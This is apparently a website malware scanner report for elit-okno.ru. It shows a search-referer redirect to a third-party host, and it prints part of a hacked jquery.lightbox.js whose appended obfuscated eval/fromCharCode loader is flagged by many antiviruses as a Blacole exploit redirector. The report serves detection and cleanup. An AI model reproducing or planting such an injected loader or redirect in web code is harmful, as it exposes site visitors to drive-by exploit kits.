New scan:

Malware Scanner report for elit-okno.ru

Malicious/Suspicious/Total urls checked
1/0/7
1 page has malicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://hitpitlit.osa.pl/threat/
30 websites infected.

The website "elit-okno.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://elit-okno.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: elit-okno.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Thu, 28 Aug 2014 07:40:26 GMT
Location: http://hitpitlit.osa.pl/threat/
Server: Jino.ru/mod_pizza
Content-Length: 0
Content-Type: text/html
malicious

Scanned pages/files

RequestServer responseStatus
http://elit-okno.ru/
200 OK
Content-Length: 24233
Content-Type: text/html
clean
http://elit-okno.ru/js/swfobject.js
200 OK
Content-Length: 9760
Content-Type: application/javascript
clean
http://elit-okno.ru/js/jquery.js
200 OK
Content-Length: 31034
Content-Type: application/javascript
clean
http://elit-okno.ru/js/jquery.lightbox.js?show_linkback=false&show_helper_text=false&show_info=auto&show_extended_info=false&keys.close=z&keys.prev=q&keys.next=e&text.image=Ôîòî&text.of=èç&text.close=Çàêðûòü&text.download=Çàãðóçèòü
200 OK
Content-Length: 56825
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($)
{
if ( typeof $.log === 'undefined' ) {
if ( !$.browser.safari && typeof window.console !== 'undefined' && typeof window.console.log === 'function' )
{ $.log = function(){
var args = [];
for(var i = 0; i < arguments.length; i++) {
args.push(arguments[i]);
}
window.console.log.apply(window.console, args);
}
$.console = {
log: $.log,
debug: window.consol
... 3342 bytes are skipped ...
-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;697!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](40+1*w[j]);}if(f)z=s;e(z);

Antivirus reports:

AntiVir
EXP/JS.Blacole.BZ
Avast
JS:Redirector-UB [Trj]
Ad-Aware
Trojan.JS.Redirector.AUU
Ikarus
Trojan.Script
nProtect
Trojan.JS.Redirector.AUU
K7AntiVirus
Exploit ( 04c5578c1 )
Emsisoft
Trojan.JS.Redirector.AUU (B)
Comodo
TrojWare.JS.Agent.HJ
K7GW
Exploit ( 04c5578c1 )
McAfee-GW-Edition
JS/Exploit-Blacole.bm
DrWeb
JS.IFrame.233
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Trojan:JS/Redirector.JN
Kaspersky
Trojan-Downloader.JS.Agent.gpp
MicroWorld-eScan
Trojan.JS.Redirector.AUU
Fortinet
JS/Obfuscus.AACA!tr
TotalDefense
JS/BlacoleRef.M
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.bm
NANO-Antivirus
Trojan.Script.Agent.rrcam
F-Secure
Trojan.JS.Redirector.AUU
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Redir.JX
AVG
Script/Exploit.Kit
Norman
Exploit.AJN
Sophos
Troj/PhoexRef-A
GData
Trojan.JS.Redirector.AUU
Symantec
Trojan.Malscript
Commtouch
JS/Redir.JX
BitDefender
Trojan.JS.Redirector.AUU

http://elit-okno.ru//mc.yandex.ru/metrika/watch.js/
404 Not Found
Content-Length: 1734
Content-Type: text/html
clean
http://elit-okno.ru/test404page.js
404 Not Found
Content-Length: 1734
Content-Type: text/html
clean
http://statun.345.pl/counter.php
500 timeout
Content-Length: 30
Content-Type: text/plain
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=elit-okno.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://elit-okno.ru/

Result: elit-okno.ru is not infected or malware details are not published yet.